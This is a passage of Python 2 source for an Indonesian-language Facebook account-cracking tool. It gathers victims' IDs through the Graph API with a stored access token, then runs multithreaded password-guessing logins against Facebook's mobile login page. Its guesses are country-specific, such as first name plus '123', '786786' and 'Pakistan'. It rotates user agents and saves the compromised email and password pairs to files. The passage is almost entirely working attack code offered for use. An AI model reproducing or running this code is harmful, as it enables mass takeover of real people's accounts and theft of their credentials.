print ('\033[0;96m3.\033[0;97m Crack Dari File');time.sleep(0.07)
print ('\033[0;91m0.\033[0;97m Kembali');time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
pilih_indo()
#### PILIH INDONESIA ####
def pilih_indo():
teak = raw_input('\033[0;96m>\033[0;97m ')
if teak =="":
print '\033[0;91m! Isi Yg Benar'
pilih_indo()
elif teak =="1":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif teak =="2":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idt = raw_input("\033[0;91m• \033[0;96mID Publik/Teman \033[0;91m:\033[0;92m ");time.sleep(0.07)
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
sp = json.loads(pok.text)
print "\033[0;91m•\033[0;96m Nama \033[0;91m:\033[0;92m "+sp["name"]
except KeyError:
print "\033[0;91m! ID publik/teman tidak ada"
raw_input("\n\033[1;97m< \033[0;96mKembali \033[0;97m>")
crack_indo()
except requests.exceptions.ConnectionError:
print '\033[0;91m! Tidak ada koneksi'
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak =="3" or teak =="03":
os.system('clear')
print logo
try:
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idlist = raw_input('\033[0;91m• \033[0;96mNama File\033[0;91m :\033[0;92m ');time.sleep(0.07)
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[0;91mFile tidak ada ! '
raw_input('\033[0;97m<\033[0;96m Kembali\033[0;97m >')
except IOError:
print '\033[0;91mFile tidak ada !'
raw_input("\n\033[0;97m< \033[0;96mKembali \033[0;97m>")
crack_indo()
elif teak =="0" or teak =="00":
crack_teman()
else:
print '\033[0;91m! Isi Yg Benar'
pilih_indo()
print '\033[0;91m• \033[0;96mJumlah ID\033[0;91m :\033[0;92m '+str(len(id));time.sleep(0.07)
print ('\033[0;91m• \033[0;96mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[0;91m• \033[0;96mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print ("\n\033[0;91m• \033[0;96mTidak Ada Hasil ? Gunakan Mode Pesawat 1 Detik !");time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
### MAIN INDONESIA ###
def main(arg):
global cekpoint,oks
em = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+em+'/?access_token='+toket)
v = json.loads(an.text)
pw = v['first_name']+'123'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pw, "login" : "submit"}, headers = { "user-agent" : "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pw
oke = open('done/indo.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pw)
oke.close()
oks.append(em)
else :
if 'checkpoint' in xo:
print '\033[0;96m[Cekpoint]\033[0;97m '+em+' \033[0;96m∆\033[0;97m '+pw
cek = open('done/indo.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pw)
cek.close()
cekpoint.append(em)
else:
pw2 = v['first_name']+'12345'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pw2, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.1.2; AFTMM Build/NS6265; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pw2
oke = open('done/indo.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pw2)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;96m[Cekpoint]\033[0;97m '+em+' \033[0;96m∆\033[0;97m '+pw2
cek = open('done/indo.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pw2)
cek.close()
cekpoint.append(em)
else:
pw3 = v['first_name']+'1234'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pw3, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 6.0.1; SM-G532G Build/MMB29T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pw3
oke = open('done/indo.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pw3)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;96m[Cekpoint]\033[0;97m '+em+' \033[0;96m∆\033[0;97m '+pw3
cek = open('done/indo.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pw3)
cek.close()
cekpoint.append(em)
else:
pw4 = 'Sayang'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pw4, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.0; SM-G610M Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pw4
oke = open('done/indo.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pw4)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;96m[Cekpoint]\033[0;97m '+em+' \033[0;96m∆\033[0;97m '+pw4
cek = open('done/indo.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pw4)
cek.close()
cekpoint.append(em)
except:
pass
p = ThreadPool(20)
p.map(main, id)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print '\033[0;91m• \033[0;96mSelesai ...'
print"\033[0;91m• \033[0;96mTotal \033[0;92mOK\033[0;97m/\x1b[0;96mCP \033[0;97m: \033[0;92m"+str(len(oks))+"\033[0;97m/\033[0;96m"+str(len(cekpoint))
print '\033[0;91m• \033[0;92mOK\033[0;97m/\x1b[0;96mCP \033[0;96mfile tersimpan \033[0;91m: \033[0;92mdone/indo.txt'
print 50* "\033[0;93m─"
raw_input("\033[0;97m< \033[0;96mKembali\033[0;97m >")
os.system("python2 crack-2.py")
#### CRACK BANGLADESH ####
def crack_bangla():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print '\033[0;91m! Token Invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print ('\033[0;94m1.\033[0;97m Crack Dari Daftar Teman');time.sleep(0.07)
print ('\033[0;94m2.\033[0;97m Crack Dari Publik/Teman');time.sleep(0.07)
print ('\033[0;94m3.\033[0;97m Crack Dari File');time.sleep(0.07)
print ('\033[0;91m0.\033[0;97m Kembali');time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
pilih_bangla()
### PILIH BANGLADESH ###
def pilih_bangla():
teak = raw_input('\033[0;94m>\033[0;97m ')
if teak =="":
print '\033[0;91m! Isi Yg Benar'
pilih_bangla()
elif teak =="1":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif teak =="2":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idt = raw_input("\033[0;91m• \033[0;94mID Publik/Teman \033[0;91m:\033[0;92m ");time.sleep(0.07)
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
sp = json.loads(pok.text)
print "\033[0;91m•\033[0;94m Nama \033[0;91m:\033[0;92m "+sp["name"]
except KeyError:
print "\033[0;91m! ID publik/teman tidak ada"
raw_input("\n\033[1;97m< \033[0;94mKembali \033[0;97m>")
crack_bangla()
except requests.exceptions.ConnectionError:
print '\033[0;91m! Tidak ada koneksi'
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak =="3" or teak =="03":
os.system('clear')
print logo
try:
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idlist = raw_input('\033[0;91m• \033[0;94mNama File\033[0;91m :\033[0;92m ');time.sleep(0.07)
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[0;91mFile tidak ada ! '
raw_input('\033[0;97m<\033[0;94m Kembali\033[0;97m >')
except IOError:
print '\033[0;91mFile tidak ada !'
raw_input("\n\033[0;97m< \033[0;94mKembali \033[0;97m>")
crack_bangla()
elif teak =="0" or teak =="00":
crack_teman()
else:
print '\033[0;91m! Isi Yg Benar'
pilih_bangla()
print '\033[0;91m• \033[0;94mJumlah ID\033[0;91m :\033[0;92m '+str(len(id));time.sleep(0.07)
print ('\033[0;91m• \033[0;94mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[0;91m• \033[0;94mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print ("\n\033[0;91m• \033[0;94mTidak Ada Hasil ? Gunakan Mode Pesawat 1 Detik !");time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
### MAIN BANGLADESH ###
def main(arg):
global cekpoint,oks
em = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+em+'/?access_token='+toket)
v = json.loads(an.text)
pz = v['first_name']+'123'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pz, "login" : "submit"}, headers = { "user-agent" : "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pz
oke = open('done/bangla.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pz)
oke.close()
oks.append(em)
else :
if 'checkpoint' in xo:
print '\033[0;94m[Cekpoint]\033[0;97m '+em+' \033[0;94m∆\033[0;97m '+pz
cek = open('done/bangla.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pz)
cek.close()
cekpoint.append(em)
else:
pz2 = v['first_name']+'12345'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pz2, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.1.2; AFTMM Build/NS6265; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pz2
oke = open('done/bangla.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pz2)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;94m[Cekpoint]\033[0;97m '+em+' \033[0;94m∆\033[0;97m '+pz2
cek = open('done/bangla.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pz2)
cek.close()
cekpoint.append(em)
else:
pz3 = v['first_name']+'1234'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pz3, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 6.0.1; SM-G532G Build/MMB29T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pz3
oke = open('done/bangla.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pz3)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;94m[Cekpoint]\033[0;97m '+em+' \033[0;94m∆\033[0;97m '+pz3
cek = open('done/bangla.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pz3)
cek.close()
cekpoint.append(em)
else:
pz4 = '786786'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pz4, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.0; SM-G610M Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pz4
oke = open('done/bangla.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pz4)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;94m[Cekpoint]\033[0;97m '+em+' \033[0;94m∆\033[0;97m '+pz4
cek = open('done/bangla.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pz4)
cek.close()
cekpoint.append(em)
except:
pass
p = ThreadPool(20)
p.map(main, id)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print '\033[0;91m• \033[0;94mSelesai ...'
print"\033[0;91m• \033[0;94mTotal \033[0;92mOK\033[0;97m/\x1b[0;94mCP \033[0;97m: \033[0;92m"+str(len(oks))+"\033[0;97m/\033[0;94m"+str(len(cekpoint))
print '\033[0;91m• \033[0;92mOK\033[0;97m/\x1b[0;94mCP \033[0;94mfile tersimpan \033[0;91m: \033[0;92mdone/bangla.txt'
print 50* "\033[0;93m─"
raw_input("\033[0;97m< \033[0;94mKembali\033[0;97m >")
os.system("python2 crack-2.py")
#### CRACK PAKISTAN ####
def crack_pakis():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print '\033[0;91m! Token Invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print ('\033[0;90m1.\033[0;97m Crack Dari Daftar Teman');time.sleep(0.07)
print ('\033[0;90m2.\033[0;97m Crack Dari Publik/Teman');time.sleep(0.07)
print ('\033[0;90m3.\033[0;97m Crack Dari File');time.sleep(0.07)
print ('\033[0;91m0.\033[0;97m Kembali');time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
pilih_pakis()
### PILIH PAKISTAN ###
def pilih_pakis():
teak = raw_input('\033[0;90m>\033[0;97m ')
if teak =="":
print '\033[0;91m! Isi Yg Benar'
pilih_pakis()
elif teak =="1":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif teak =="2":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idt = raw_input("\033[0;91m• \033[0;90mID Publik/Teman \033[0;91m:\033[0;92m ");time.sleep(0.07)
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
sp = json.loads(pok.text)
print "\033[0;91m•\033[0;90m Nama \033[0;91m:\033[0;92m "+sp["name"]
except KeyError:
print "\033[0;91m! ID publik/teman tidak ada"
raw_input("\n\033[1;97m< \033[0;90mKembali \033[0;97m>")
crack_pakis()
except requests.exceptions.ConnectionError:
print '\033[0;91m! Tidak ada koneksi'
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak =="3" or teak =="03":
os.system('clear')
print logo
try:
print ("\033[0;93m────────────────────────────────────────────────────");time.sleep(0.07)
idlist = raw_input('\033[0;91m• \033[0;90mNama File\033[0;91m :\033[0;92m ');time.sleep(0.07)
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[0;91mFile tidak ada ! '
raw_input('\033[0;97m<\033[0;90m Kembali\033[0;97m >')
except IOError:
print '\033[0;91mFile tidak ada !'
raw_input("\n\033[0;97m< \033[0;90mKembali \033[0;97m>")
crack_pakis()
elif teak =="0" or teak =="00":
crack_teman()
else:
print '\033[0;91m! Isi Yg Benar'
pilih_pakis()
print '\033[0;91m• \033[0;90mJumlah ID\033[0;91m :\033[0;92m '+str(len(id));time.sleep(0.07)
print ('\033[0;91m• \033[0;90mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[0;91m• \033[0;90mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print ("\n\033[0;91m• \033[0;90mTidak Ada Hasil ? Gunakan Mode Pesawat 1 Detik !");time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
### MAIN PAKISTAN ###
def main(art):
global cekpoint,oks
ef = art
try:
os.mkdir('done')
except OSError:
pass
try:
ah = requests.get('https://graph.facebook.com/'+ef+'/?access_token='+toket)
p = json.loads(ah.text)
pb = 'Pakistan'
rep = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : ef, "pass" : pb, "login" : "submit"}, headers = { "user-agent" : "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"})
xs = rep.content
if 'mbasic_logout_button' in xs or 'save-device' in xs:
print '\033[0;92m[Berhasil]\033[0;97m '+ef+' \033[0;92m∆ \033[0;97m'+pb
oke = open('done/pakis.txt', 'a')
oke.write('\n[Berhasil] '+ef+' ∆ '+pb)
oke.close()
oks.append(ef)
else :
if 'checkpoint' in xs:
print '\033[0;90m[Cekpoint]\033[0;97m '+ef+' \033[0;90m∆\033[0;97m '+pb
cek = open('done/pakis.txt', 'a')
cek.write('\n[Cekpoint] '+ef+' ∆ '+pb)
cek.close()
cekpoint.append(ef)
else:
pb2 = '786786'
rep = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : ef, "pass" : pb2, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.1.2; AFTMM Build/NS6265; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36"})
xs = rep.content
if 'mbasic_logout_button' in xs or 'save-device' in xs:
print '\033[0;92m[Berhasil]\033[0;97m '+ef+' \033[0;92m∆ \033[0;97m'+pb2
oke = open('done/pakis.txt', 'a')
oke.write('\n[Berhasil] '+ef+' ∆ '+pb2)
oke.close()
oks.append(ef)
else:
if 'checkpoint' in xs:
print '\033[0;90m[Cekpoint]\033[0;97m '+ef+' \033[0;90m∆\033[0;97m '+pb2
cek = open('done/pakis.txt', 'a')
cek.write('\n[Cekpoint] '+ef+' ∆ '+pb2)
cek.close()
cekpoint.append(ef)
else:
pb3 = p['first_name']+'1234'
rep = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : ef, "pass" : pb3, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 6.0.1; SM-G532G Build/MMB29T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Mobile Safari/537.36"})
xs = rep.content
if 'mbasic_logout_button' in xs or 'save-device' in xs:
print '\033[0;92m[Berhasil]\033[0;97m '+ef+' \033[0;92m∆ \033[0;97m'+pb3
oke = open('done/pakis.txt', 'a')
oke.write('\n[Berhasil] '+ef+' ∆ '+pb3)
oke.close()
oks.append(ef)
else:
if 'checkpoint' in xs:
print '\033[0;90m[Cekpoint]\033[0;97m '+ef+' \033[0;90m∆\033[0;97m '+pb3
cek = open('done/pakis.txt', 'a')
cek.write('\n[Cekpoint] '+ef+' ∆ '+pb3)
cek.close()
cekpoint.append(ef)
else:
pb4 = p['first_name']+'12345'
rep = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : ef, "pass" : pb4, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.0; SM-G610M Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36"})
xs = rep.content
if 'mbasic_logout_button' in xs or 'save-device' in xs:
print '\033[0;92m[Berhasil]\033[0;97m '+ef+' \033[0;92m∆ \033[0;97m'+pb4
oke = open('done/pakis.txt', 'a')
oke.write('\n[Berhasil] '+ef+' ∆ '+pb4)
oke.close()
oks.append(ef)
else:
if 'checkpoint' in xs:
print '\033[0;90m[Cekpoint]\033[0;97m '+ef+' \033[0;90m∆\033[0;97m '+pb4
cek = open('done/pakis.txt', 'a')
cek.write('\n[Cekpoint] '+ef+' ∆ '+pb4)
cek.close()
cekpoint.append(ef)
else:
pb5 = p['first_name']+'123'
rep = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : ef, "pass" : pb5, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.1.2; AFTMM Build/NS6265; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36"})
xs = rep.content
if 'mbasic_logout_button' in xs or 'save-device' in xs:
print '\033[0;92m[Berhasil]\033[0;97m '+ef+' \033[0;92m∆ \033[0;97m'+pb5
oke = open('done/pakis.txt', 'a')
oke.write('\n[Berhasil] '+ef+' ∆ '+pb5)
oke.close()
oks.append(ef)
else:
if 'checkpoint' in xs:
print '\033[0;90m[Cekpoint]\033[0;97m '+ef+' \033[0;90m∆\033[0;97m '+pb5
cek = open('done/pakis.txt', 'a')
cek.write('\n[Cekpoint] '+ef+' ∆ '+pb5)
cek.close()
cekpoint.append(ef)
except:
pass
p = ThreadPool(20)
p.map(main, id)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print '\033[0;91m• \033[0;90mSelesai ...'
print"\033[0;91m• \033[0;90mTotal \033[0;92mOK\033[0;97m/\x1b[0;90mCP \033[0;97m: \033[0;92m"+str(len(oks))+"\033[0;97m/\033[0;90m"+str(len(cekpoint))
print '\033[0;91m• \033[0;92mOK\033[0;97m/\x1b[0;90mCP \033[0;90mfile tersimpan \033[0;91m: \033[0;92mdone/pakis.txt'
print 50* "\033[0;93m─"
raw_input("\033[0;97m< \033[0;90mKembali\033[0;97m >")
os.system("python2 crack-2.py")
#### CRACK USA ####
def crack_usa():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print '\033[0;91m! Token Invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print ('\033[0;95m1.\033[0;97m Crack Dari Daftar Teman');time.sleep(0.07)
print ('\033[0;95m2.\033[0;97m Crack Dari Publik/Teman');time.sleep(0.07)
print ('\033[0;95m3.\033[0;97m Crack Dari File');time.sleep(0.07)
print ('\033[0;91m0.\033[0;97m Kembali');time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
pilih_usa()
### PILIH USA ###
def pilih_usa():
teak = raw_input('\033[0;95m>\033[0;97m ')
if teak =="":
print '\033[0;91m! Isi Yg Benar'
pilih_usa()
elif teak =="1":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif teak =="2":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idt = raw_input("\033[0;91m• \033[0;95mID Publik/Teman \033[0;91m:\033[0;92m ");time.sleep(0.07)
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
sp = json.loads(pok.text)
print "\033[0;91m•\033[0;95m Nama \033[0;91m:\033[0;92m "+sp["name"]
except KeyError:
print "\033[0;91m! ID publik/teman tidak ada"
raw_input("\n\033[1;97m< \033[0;95mKembali \033[0;97m>")
crack_usa()
except requests.exceptions.ConnectionError:
print '\033[0;91m! Tidak ada koneksi'
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak =="3" or teak =="03":
os.system('clear')
print logo
try:
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idlist = raw_input('\033[0;91m• \033[0;95mNama File\033[0;91m :\033[0;92m ');time.sleep(0.07)
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[0;91mFile tidak ada ! '
raw_input('\033[0;97m<\033[0;95m Kembali\033[0;97m >')
except IOError:
print '\033[0;91mFile tidak ada !'
raw_input("\n\033[0;97m< \033[0;95mKembali \033[0;97m>")
crack_usa()
elif teak =="0" or teak =="00":
crack_teman()
else:
print '\033[0;91m! Isi Yg Benar'
pilih_usa()
print '\033[0;91m• \033[0;95mJumlah ID\033[0;91m :\033[0;92m '+str(len(id));time.sleep(0.07)
print ('\033[0;91m• \033[0;95mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[0;91m• \033[0;95mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print ("\n\033[0;91m• \033[0;95mTidak Ada Hasil ? Gunakan Mode Pesawat 1 Detik !");time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
### MAIN USA ###
def main(arg):
global cekpoint,oks
em = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+em+'/?access_token='+toket)
v = json.loads(an.text)
px = v['first_name']+'123'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : px, "login" : "submit"}, headers = { "user-agent" : "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+px
oke = open('done/usa.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+px)
oke.close()
oks.append(em)
else :
if 'checkpoint' in xo:
print '\033[0;95m[Cekpoint]\033[0;97m '+em+' \033[0;95m∆\033[0;97m '+px
cek = open('done/usa.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+px)
cek.close()
cekpoint.append(em)
else:
px2 = v['first_name']+'12345'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : px2, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.1.2; AFTMM Build/NS6265; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+px2
oke = open('done/usa.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+px2)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;95m[Cekpoint]\033[0;97m '+em+' \033[0;95m∆\033[0;97m '+px2
cek = open('done/usa.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+px2)
cek.close()
cekpoint.append(em)
else:
px3 = v['first_name']+'1234'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : px3, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 6.0.1; SM-G532G Build/MMB29T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+px3
oke = open('done/usa.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+px3)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;95m[Cekpoint]\033[0;97m '+em+' \033[0;95m∆\033[0;97m '+px3
cek = open('done/usa.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+px3)
cek.close()
cekpoint.append(em)
else:
px4 = '123456'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : px4, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.0; SM-G610M Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+px4
oke = open('done/usa.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+px4)
oke.close()
oks.append(em)
else:
